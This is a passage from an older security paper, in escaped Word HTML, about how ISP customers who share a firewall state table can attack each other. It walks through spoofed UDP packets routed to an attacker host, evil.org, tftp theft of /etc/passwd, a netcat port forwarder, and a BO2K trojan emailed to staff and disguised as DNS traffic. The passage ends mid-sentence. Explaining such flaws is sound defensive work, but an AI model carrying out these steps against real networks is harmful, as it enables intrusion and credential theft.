&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;11.3) to make sure that traffic cannot pass from one customer to another &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;without passing through the ACL. TACACS+ or RADIUS determines which customer &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;should have this ACL installed (the ACL is defined in the router &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;configuration, not in the TACACS+ or RADIUS configuration file). Depending on&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;the ISP's setup, either a separate RACL will be installed for each customer,&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;or every customer uses the same RACL. This document assumes the latter.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;It may be possible to use standard (extended) ACLs, but the idea behind RACL &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;is that timeouts are introduced in a kind of "state table". A standard ACL &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;doesn't have this; it validates packets using static rules.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;For more on RACLs, check out http://www.cisco.com/univercd/cc/td/doc/product/&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;software/ios113ed/113ed_cr/secur_c/scprt3/screflex.htm (no spaces in this&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;URL).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;Where is the problem?&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;---------------------&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;Both the firewall and the router containing the RACL uses some form of "state &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;table". This table defines what packets have left the inside, and usually&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;contains the following information (at least):&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;Source IP&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;Source port&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;Destination IP&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;Destination port&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;The router or firewall determines what packets are allowed through from the&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;outside depending on this table. TCP packets destined for the inside cannot &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;have the SYN flag set (unless specified in the filter rule), and are discarded.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;UDP packets are not allowed through unless:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;a) specified in the RACL&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;b) a UDP packet has been initiated from the inside first AND&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;        &lt;/span&gt;c) the UDP reply has been received within a predefined time limit&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;Timers are used to invalidate UDP "sessions", since there is no way of knowing&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;when a UDP session ends (without looking at the overlying protocol).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;This sounds innocuous enough if you are the only user of the firewall (this&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;is what happens when you have your own). However, in the above context, several&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;networks share the same firewall, and indeed, the same state table. If we &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;assume that all the customers are Nice(tm), then there shouldn't be a problem.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;We should be paranoid, though, and consider the following scenario. What if&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;Customer-2 really dislikes Customer-1? In fact, how about Customer-2 (mean.com)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;dislikes Customer-1 (nice.com) so much that Customer-2 gets in touch with &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;Mr. Evil (evil.org) on the Internet? See figure 3 for a quick situation &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;overview.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;                                         &lt;/span&gt;+----------+&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;                           &lt;/span&gt;{Internet}----| Mr. Evil | evil.org &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;                               &lt;/span&gt;|&lt;span style=""&gt;         &lt;/span&gt;+----------+&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;                               &lt;/span&gt;|&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;                          &lt;/span&gt;+----------+&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;                          &lt;/span&gt;|&lt;span style=""&gt;  &lt;/span&gt;RACL/&lt;span style=""&gt;   &lt;/span&gt;|&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;                          &lt;/span&gt;| Firewall |&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;                          &lt;/span&gt;+----------+&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;                          &lt;/span&gt;/&lt;span style=""&gt;    &lt;/span&gt;|&lt;span style=""&gt;     &lt;/span&gt;\&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;                         &lt;/span&gt;/&lt;span style=""&gt;     &lt;/span&gt;|&lt;span style=""&gt;      &lt;/span&gt;\&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;               &lt;/span&gt;+--------+&lt;span style=""&gt;  &lt;/span&gt;+--------+&lt;span style=""&gt;  &lt;/span&gt;+--------+&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;               &lt;/span&gt;| Cust-1 |&lt;span style=""&gt;  &lt;/span&gt;| Cust-2 |&lt;span style=""&gt;  &lt;/span&gt;| Cust-3 | ...&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;               &lt;/span&gt;+--------+&lt;span style=""&gt;  &lt;/span&gt;+--------+&lt;span style=""&gt;  &lt;/span&gt;+--------+&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;                &lt;/span&gt;nice.com&lt;span style=""&gt;    &lt;/span&gt;mean.com&lt;span style=""&gt;       &lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;                                 &lt;/span&gt;Figure 3&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;Staging the attack&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;------------------&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;Since they all share the same state table, Cust-2 could inject fake UDP packets&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;containing Cust-1's source IP and Mr. Evil's destination IP. Let's place &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;ourselves in Mr. Mean's shoes and make a coordinated attack on nice.com.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;First, we call up Mr. Evil, or indeed, we just log into an account at evil.org,&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;that way we don't have to pay anyone to do our dirty deed.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;Then there are a few ways we can do the next stage. If we know that nice.com&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;is comprised of UNIX machines, we could try exploiting the possibility of &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;poorly configured tftpd(8) servers. Gaining unauthorized files using tftp(1) &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;is a very old attack, as we well know. However, tftpd(8) servers are &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;surprisingly often present on networks that rely on firewalls to protect them. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;I am quite sure there are some other remote exploits we could use; rpc.statd&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;or rpc.mountd perhaps. tftp(1) is used as an example as it is an easy thing&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;to describe. Anyway. Back to our dirty deed.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;We send the following spoofed packets from mean.com:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;src_ip:src_port&lt;span style=""&gt;              &lt;/span&gt;dst_ip:dst_port&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;&lt;span style=""&gt;  &lt;/span&gt;1.nice.com:69&lt;span style=""&gt;              &lt;/span&gt;evil.org:31337&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;&lt;span style=""&gt;  &lt;/span&gt;2.nice.com:69&lt;span style=""&gt;              &lt;/span&gt;evil.org:31337&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;&lt;span style=""&gt;  &lt;/span&gt;3.nice.com:69&lt;span style=""&gt;              &lt;/span&gt;evil.org:31337&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;          &lt;/span&gt;..&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;&lt;span style=""&gt;  &lt;/span&gt;..&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;254.nice.com:69&lt;span style=""&gt;              &lt;/span&gt;evil.org:31337 &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;From evil.org we fire up nmap[1] as root, and tell it to scan for machines&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;1-254.nice.com using source port 31337 and destination port 69. We (hopefully)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;get a few results back. It is probably a good idea to start the nmap scan&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;fairly soon after we inject the spoofed packets through the firewall/RACL as&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;the state table won't keep the UDP traffic valid for very long.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;When we have a list of usable tftpd(8) servers, we fire up our patched version&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;of tftp(1) which will let us issue requests with predefined source ports (in &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;this case 31337).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;That's about it. The firewall will (if all goes to plan[2]) let the traffic&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;through, and if there are any ill-configured tftpd(8) servers there, we might&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;be able to grab /etc/passwd (or perhaps their gateway-conf[3] files).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;Another attack&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;--------------&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;We could also stage an attack against a Windows network, but the attack &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;outlined below doesn't implicitly need mean.com. An attacker from evil.org&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;could do the same attack without having help from the "inside", i.e. there&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;would no need for a port forwarder on evil.org; one could just fire up the&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;BO2K administration software there. (I ran out of ideas here, ok? Perhaps one &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;could stage a NetBIOS attack or something.)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;Set up a port forwarder on evil.org, which points UDP port 1138 to &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;salesguy.nice.com port 53. Netcat (hobbit@avian.org) can be used for this.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;1) Send an email to some of his employees (phone up nice.com's&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;&lt;span style=""&gt;   &lt;/span&gt;switchboard for the email of a sales person).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;2) Send "Dancing Pigs" + BO2K attachment to sales guy. Configure BO2K&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;&lt;span style=""&gt;   &lt;/span&gt;to use UDP on port 53 (perhaps using this port will not seem&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;&lt;span style=""&gt;   &lt;/span&gt;too suspicious in any firewall logs, as it could be confused with&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;&lt;span style=""&gt;   &lt;/span&gt;a regular DNS request).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;3) Wait for BO2K to install itself (SpeakEasy or ButtTrumpet will &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;&lt;span style=""&gt;   &lt;/span&gt;tell us when 